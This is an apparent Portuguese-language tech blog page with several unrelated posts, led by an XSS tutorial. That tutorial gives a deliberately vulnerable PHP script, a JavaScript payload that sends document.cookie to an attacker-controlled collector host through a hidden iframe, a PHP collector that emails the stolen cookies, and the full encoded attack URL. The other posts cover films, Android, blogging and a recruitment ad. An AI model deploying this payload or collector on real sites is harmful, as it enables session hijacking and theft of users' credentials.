Este artigo tem como objectivo, demostrar aplicações de um ataque de XSS, uma técnica muito presente no nosso dia-a-dia.

O XSS ( CROSS SITE SCRIPTING ) é um tipo de ataque que é altamente popular nos dias de hoje e literalmente, pega a maioria dos usuários por estar escondido em páginas que eles acham que não podem lhes causar problemas.

O conceito é bem básico. Em geral, o administrador de um site qualquer, coloca um comentário ou post em um fórum que não contém nenhum tipo de validação ou filtro (muito incomum isto hoje em dia, mas o que mais tem por aí, é web developer acostumado com desenvolvimento sem segurança.

Vamos direito ao assunto. Um exemplo de código PHP vulnerável:

<?php
/*
* Um simples exemplo de cookies que geralmente
* são utilizados em sistemas web.
* PHPSESSID -> SID padrão da configuração do PHP
* login e senha -> cookies ficticios
*/

setcookie('PHPSSESID', 'meu_sid');
setcookie('login', 'meu_login');
setcookie('senha', 'minha_senha');

/**
* Parte vulnerável do código: Imprime os dados passados
* pelo usuário sem nenhum tratamento
*/

echo $_GET['var'];

?>

O nosso objectivo

Eis o JavaScript que iremos atravessar para nosso alvo através da variável $_GET['var'], do script PHP acima:

<script>
document.write('<iframe width=1 height=1
src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(/ /g,'')+'></iframe>')
</script>

Breve explicação meio longa

Nosso objectivo é atravessar o JavaScript citado acima mas, em outras palavras, explicando o JavaScript, nosso objectivo é simplesmente capturar os dados de cookie do www.alvo.com e enviar para o www.colector.com.

Utilizando cookies em JavaScript

A instrução document.cookie retorna os cookies da página HTML. Ou seja, um código <script>alert(document.cookie)</script> no script PHP acima irá produzir o seguinte alerta de saída:

PHPSSESID=meu_sid; login=meu_login; senha=minha_senha

Complementando a instrução com "replace", document.cookie.replace(/ /g,''), iremos remover os caracteres em branco do alerta de saída citado acima. Ou seja, agora teremos:

PHPSSESID=meu_sid;login=meu_login;senha=minha_senha

O colector de dados

Sob nosso domínio temos o site www.coletor.com, que por sua vez receberá os dados do cookie enviados pelo nosso script através do script rc.php que enviará os dados para meu@email.com:

<?php
if ($_GET['xss']) {
mail('meu@email.com','Dados capturados', $_GET['xss']);
}
?>

Testando

Acesse a URL:

http://www.alvo.com/codigo_vulneravel.php?var=<script>document.write('<iframe%
20width=1%20height=1%20src=http://www.colector.com/rc.php?xss='%2B
document.cookie.replace(/%20/g,'')%2B'></iframe>')</script>

Nota para tradução da URL:

• %20: Caractere em branco
• %2B: Sinal +

Se nenhum erro do interpretador do JavaScript for acusado em seu navegador, que geralmente é exibido no rodapé da página (ou alertas mais explícitos quando se possui depuradores de JavaScript), verifique o meu@email.com.

Possíveis utilizações

O impacto desse ataque é mais grave em sistemas interactivos, como fóruns e webmails. Pois como mostrado, com os dados de cookie é possível capturar senhas de e-mail, de utilizadores e administradores do fórum vulnerável.

Gostaria de salientar que as informações aqui contidas são de carácter educativo. Não me responsabilizo por sua utilização, ou eventuais dados ao seu sistema ou de terceiros.

Considerações finais

O ambiente de testes desse artigo utiliza a configuração padrão do PHP.

Espero que tenham gostado

Até a Próxima

Tags: XSS | vulnerabilidade | ataque | hacking | javascript

Sim, eu sei que já passou algum tempo, mas eu finalmente resolvi comentar sobre o último filme do Batman: The Dark Knight.

Resumindo: gostei.

Agora os detalhes...

O Joker está simplesmente fantástico. Ele valeu o filme todo. Duas-Caras: excepcional. Na verdade parece que os vilões foram os heróis do filme :)

O Batman parece que vai de mal a pior. O uniforme está ficando cada vez mais estranho (no primeiro filme estava beeem melhor). E que p**** de voz é aquela ?? Ninguém merece.

Esse vídeo coloca muito bem essa questão da voz:

Tags: filme | batman | cinema

Já apanhei 'surra' com uso de packages. Hoje tento passar do pouco que sei.

Tags: java pacotes | java packages | java

Prezados Membros do Tian,

 

Pesquisei seu web e gostaria de dar algumas informacoes a respeito do projeto que estamos envolvidos. Me chamo Ana Chaves e trabalho em uma empresa chamada GLOBAL CAREER COMPANY em Londres. Minha empresa e uma consultora internacional de recrutamento especializada no mercado africano. Organizamos Foruns de recrutamento denominados Careers in Africa  a nivel mundial para africanos que pretendem regressar aos seus paises de origem depois de terminarem seus estudos. Este ano vamos estar em Sao Paulo com muitas oportunidades para os PALOP e em especial para Angola. Gostariamos de contar com sua ajuda para a divulgaçao de toda a comunidade Angolana nesta importante oportunidade de trabalho. Por favor de uma olhada na descricao abaixo e se tiver interesse em obter maiores informacoes nao hesite em contactar-me no e-mail abaixo.

 

Fórum de Recrutamento Careers in Africa, São Paulo, 3-4 Outubro 2008

 

Oportunidades de emprego para os PALOP: Várias posições, sectores de actividade e localizações!

 

Faça parte deste evento exclusivo de participação por convite que inclui entrevistas pré-agendadas, apresentações e sessões de networking com empregadores líderes nos PALOP!

 

Se possui autorização para trabalhar em pelo menos um dos países PALOP, fluência em português e inglês, uma licenciatura ou qualificação profissional e experiência internacional, inscreva-se imediatamente no nosso website www.careersinafrica.com, completando uma candidatura online e submetendo uma cópia do seu CV mais actualizado.

 

Se o seu perfil se enquadrar nos critérios de alguma das empresas participantes, o seu CV será enviado para apreciação interna das mesmas. A Global Career Company irá então convida-lo/a para o Fórum de Recrutamento, onde a sua entrevista terá lugar.

 

Empresas que já confirmaram a sua participação no evento de São Paulo:

·         Unitel

 

·         Movicel

 

·         Odebrecht

 

·         Petrobras

 

·         Total

 

·         Escom

 

·         Chevron

 

·         Coca-Cola Bottling Luanda

 

Para mais informações ou esclarecimentos, por favor contacte Ana Chaves através do email anal@globalcc.net ou Tel. Nº. +44 207 348 9097

 

Obrigada pela atençao e aguardo retorno.

 

Atenciosamente,

Ana Chaves

Recruiter

 

Tags:

Todos usam instant messenger hoje em dia... lembro quando o ICQ era O instant messenger, bons tempos...

Bom, existem vários im bons, muito bons mesmo para GNU/Linux; eu uso o pidgin (antigo gaim) não por ser o melhor, mas pelo que oferece a opção multiprotocolar (icq, msn, jabber, etc) em um só cliente. Claro que existem outros que fazem isso, mas dentre eles o pidgin é o que mais gosto.

Tags: aMSN | Instant Messenger | aOS

Alterar Idioma do Windows XP ou Vista para Portugues.

Altere o idioma de seu Windows com o recurso MUI

Tags:

A menos que você tenha passado os últimos meses escondido dentro de um iglu na Antártida, você já deve ter ouvido falar no Android, o sistema operacional para celulares que está sendo desenvolvido pela Google. Você pode ver alguns vídeos de apresentação em http://www.youtube.com/user/androide

Atualmente, as três principais plataformas para celulares e smartphones são o Symbian, que deu origem ao S60,
desenvolvido pela Nokia (e encontrado também em aparelhos da LG, Samsung e alguns outros fabricantes) e também ao UIQ, encontrado em aparelhos da Sony-Ericsson e da Motorola; o Windows Mobile, que é encontrado
em muitos smartphones e o PalmOS.

O Symbian é o sucessor do Epoc, o sistema operacional usado nos antigos Psion (leia um pouco sobre eles no
http://www.guiadohardware.net/artigos/psion-historia/), que ganhou vida própria depois que a Psion faliu.

O ponto forte é o facto de ele ser um sistema multitarefa, desenvolvido para ser usado em aparelhos com poucos
recursos, aproveitando ao máximo os recursos oferecidos pelo hardware.

Ele é um sistema operacional open-source (http://code.google.com/android/), que pode vir a se tornar a plataforma dominante entre os smartphones ao longo dos próximos anos.

O Android tem tudo para conquistar espaço rapidamente, pois agrada a 4 públicos diferentes, que possuem
interesses muitas vezes antagônicos: os fabricantes de celulares, os desenvolvedores, os fabricantes de chips (incluindo a Intel) e tem tudo para agradar também os consumidores.

Tags:

Um pouco fantasista, mas tem a sua dose de verdade.

http://snnangola.wordpress.com/2008/07/27/os-administradores-de-rede-e-os-problemas-de-seguranca-da-camada-osi/

http://nataniel.tk

Tags: osi | modelo osi

...do componente de blogs do T.i.A. :)

O problema foi que o componente antigo (ainda) não é compatível com o joomla 1.5 e eu precisava de outro porque parece que não, mas um sistema de blog aqui faz falta para pra mim. Serve mais para contar o progresso de pequenos projetos e hacks meus que não são 'notícia' suficiente para estar no portal.

E como o meu antigo blog está oficialmente desativado, este vai se tornar oficial :)

Ele é tão simplesmente bom que já faz adicionou automaticamente os antigos posts que eu fiz usando o componente anterior.

...só falta agora encontrar uma forma de migrar o conteúdo do wordpress para cá. hack time again !

Tags:

Como algums devem saber, até então tenho usado o wordpress como motor oficial do meu blog (que na verdade há algum tempo que não mexo nele)... então o meu objectivo agora é descobrir uma forma de migrar o conteúdo de lá pra cá.

Do jeito que tô imaginando vai ter que ser na mão mesmo... importar as tabelas. O problema é que o wordpress não disponibiliza as tabelas (sql) para exportar... enfim, hack time :)

Tags:

Apenas um email que recebi:

Angolano não come………………………….PITA.

Angolano não bebe…………………………..CHUPA.

Angolano não roça…………………………..TARRACHA.

Angolano não dança…………………………..BAILA.

Angolano não toma o pequeno almoço……..MATABICHA.

Angolano não vai a festa………………………VAI AO BODA

Angolano não veste…………………………….TRAPA

Angolano não trabalha………………………….BUMBA

Angolano não luta……………………………….BILA

Angolano não curte……………………………...TCHILA

Angolano não faz amor………………………….TCHACA

Angolano não peida…………………………….BUFA

Angolano não faz xix………………………….SUSSA

Angolano não mente…………………………..DA JAJÃO

Angolano não tem amigo………………………TEM CAMBA

Angolano não goza……………………………..ESTIGA

Angolano não é grosso………………………É CAENCHE

Angolano não tem mama…………………….TEM XUXA

Angolano não vai para terra…………………..VAI PARA BANDA

Angolano não tem mau hálito………………..TEM DZUMBA MALAICA!

HAHAHAHAHAHAHA

KUIA MALE SER MANGOLÈ

...concordo

Tags:

É isso ae...

O T.i.A. tem serviço de blog de novo, e obviamente eu estou estreando...

Vejamos,

Entre as diversas opções implementadas, temos:

• Blog! Dashboard

• Busca rápida e links de entradas antigas enquanto escreve nova entrada.
• Etiquetas / nuvens de etiquestas (Tagclouds).
• Fácil envio e navegação de imagens.
• Publicação com um único clique.
• Entradas do blog usando AJAX.

• Blog! Administração

• Permissões de publicação.
• Moderação de etiquetas e categorias;

• Blog! Frontpage view

• Navegar blogs por palavra-chave, autor ou etiqueta.
• Forma fácil e simpes de ver todas as estradas do blog.
  
• Suporte a templates.
• del.icio.us • digg • spurl • reddit • furl suporte a favoritos sociais.
  

Divirta-se !!

Tags: